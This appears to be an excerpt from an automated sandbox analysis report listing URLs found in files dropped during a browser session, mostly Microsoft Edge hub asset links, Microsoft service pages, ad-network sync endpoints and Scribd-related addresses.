Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log1.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log2.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/extraction.autofillFull.en-us/1.0.0/asset?assetgroup=E
Source: 000003.log2.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/extraction.proactiveProduct.en-us/5.12.0/asset?assetgr
Source: 000003.log1.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 000004.log.9.drString found in binary or memory: https://eus.rubiconproject.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://eus.rubiconproject.com/usync.html?endpoint=us-east&p=rise_engage
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000C.00000003.1359756124.000001AC10800000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://gaana.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://i.liadm.com
Source: 000005.ldb.9.dr, 000003.log5.9.drString found in binary or memory: https://i.liadm.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://i.liadm.com/s/c/a-05td?duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&euns=0&s=&version=v3.8.
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: Session_13384336605253024.9.drString found in binary or memory: https://js-sec.indexww.com
Source: 000004.log.9.dr, Session_13384336605253024.9.drString found in binary or memory: https://js-sec.indexww.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://js-sec.indexww.com/um/ixmatch.html
Source: Session_13384336605253024.9.drString found in binary or memory: https://js.stripe.com
Source: 000004.log.9.dr, Session_13384336605253024.9.drString found in binary or memory: https://js.stripe.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html#url=https%3A%2F%2Fwww.scribd.
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://m.kugou.com/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://m.soundcloud.com/
Source: 000003.log10.9.drString found in binary or memory: https://m.stripe.network
Source: 000004.log.9.drString found in binary or memory: https://m.stripe.network/
Source: Session_13384336605253024.9.drString found in binary or memory: https://m.stripe.network/inner.html#url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-S
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://m.vk.com/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://music.amazon.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://music.apple.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://music.yandex.com
Source: 000004.log.9.drString found in binary or memory: https://onetag-sys.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://onetag-sys.com/usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://open.spotify.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/0/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/0/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: Reporting and NEL.13.drString found in binary or memory: https://panel-api.survicate.com/_/report_csp/survey
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: Favicons.9.drString found in binary or memory: https://s-f.scribdassets.com/scribd.ico?b2cfc7e06?v=5
Source: 000004.log.9.drString found in binary or memory: https://s.amazon-adsystem.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://s.amazon-adsystem.com/iu3?cm3ppd=1&d=dtb-pub&csif=t&dl=n-mediagrid_n-index_rx_n-acuityads_n-
Source: Cookies.13.drString found in binary or memory: https://scribd.comVP/H
Source: Cookies.13.drString found in binary or memory: https://scribd.comVPv10r
Source: Cookies.13.drString found in binary or memory: https://scribd.comXANDR_PANID/I
Source: Cookies.13.drString found in binary or memory: https://scribd.comXANDR_PANIDv10
Source: Cookies.13.drString found in binary or memory: https://scribd.comaudit_p/J/
Source: Cookies.13.drString found in binary or memory: https://scribd.comaudit_pv10V
Source: Cookies.13.drString found in binary or memory: https://scribd.comkhaos_p/K4
Source: Cookies.13.drString found in binary or memory: https://scribd.comkhaos_pv10p
Source: Cookies.13.drString found in binary or memory: https://scribd.compb_rtb_ev_part/L4
Source: Cookies.13.drString found in binary or memory: https://scribd.compb_rtb_ev_partv10
Source: Cookies.13.drString found in binary or memory: https://scribd.comreceive-cookie-deprecation/M7
Source: Cookies.13.drString found in binary or memory: https://scribd.comreceive-cookie-deprecation/N
Source: Cookies.13.drString found in binary or memory: https://scribd.comreceive-cookie-deprecation/OD
Source: Cookies.13.drString found in binary or memory: https://scribd.comreceive-cookie-deprecationv10
Source: Cookies.13.drString found in binary or memory: https://scribd.comreceive-cookie-deprecationv10eJ
Source: Cookies.13.drString found in binary or memory: https://scribd.comtluidp/PG
Source: Cookies.13.drString found in binary or memory: https://scribd.comtluidpv10i6
Source: Cookies.13.drString found in binary or memory: https://scribd.comts/Q
Source: Cookies.13.drString found in binary or memory: https://scribd.comtsv10
Source: 000004.log.9.drString found in binary or memory: https://ssum-sec.casalemedia.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://ssum-sec.casalemedia.com/usermatch?d=https%3A%2F%2Fwww.scribd.com%2F&s=184674&cb=https%3A%2F
Source: 000004.log.9.drString found in binary or memory: https://sync.adkernel.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://sync.adkernel.com/user-sync?zone=176971&dsp=763610&t=image&uid=
Source: 000004.log.9.drString found in binary or memory: https://sync.intentiq.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://sync.intentiq.com/profiles_engine/ProfilesEngineServlet?at=20&mi=10&dpi=793790479&3rddpi=148
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://tidal.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://tpc.googlesyndication.com
Source: 000004.log.9.drString found in binary or memory: https://tpc.googlesyndication.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/LVEN46HQ.html
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://twitter.com/
Source: 000004.log.9.drString found in binary or memory: https://u.openx.net/
Source: Session_13384336605253024.9.drString found in binary or memory: https://u.openx.net/w/1.0/pd?cc=1
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://vibe.naver.com/today
Source: Reporting and NEL.13.drString found in binary or memory: https://w3-reporting-csp.reddit.com/reports
Source: Reporting and NEL.13.drString found in binary or memory: https://w3-reporting-nel.reddit.com/reports
Source: Reporting and NEL.13.drString found in binary or memory: https://w3-reporting.reddit.com/reports
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://web.telegram.org/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://web.whatsapp.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.deezer.com/
Source: content_new.js.9.dr, content.js.9.drString found in binary or memory: https://www.google.com/chrome
Source: Web Data.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: f4170ab3-9d23-422d-994d-f965ad944569.tmp.13.drString found in binary or memory: https://www.googleapis.com
Source: 000003.log6.9.dr, 000003.log5.9.drString found in binary or memory: https://www.googletagmanager.com/
Source: 000003.log6.9.drString found in binary or memory: https://www.googletagmanager.com/0
Source: QuotaManager.9.drString found in binary or memory: https://www.googletagmanager.com/_default
Source: 2cc80dabc69f58b6_1.9.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/5230/sw.js?origin=https%3A%2F%2Fwww.scribd.co
Source: 000003.log6.9.dr, Session_13384336605253024.9.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/5230/sw_iframe.html?origin=https%3A%2F%2Fwww.
Source: QuotaManager.9.drString found in binary or memory: https://www.googletagmanager.com/www.googletagmanager.com_default
Source: QuotaManager.9.drString found in binary or memory: https://www.googletagmanager.com/www.googletagmanager.com_default/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.iheart.com/podcast/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.instagram.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.last.fm/
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.messenger.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.office.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 000003.log10.9.drString found in binary or memory: https://www.scribd.com
Source: 000003.log5.9.dr, Session_13384336605253024.9.drString found in binary or memory: https://www.scribd.com/
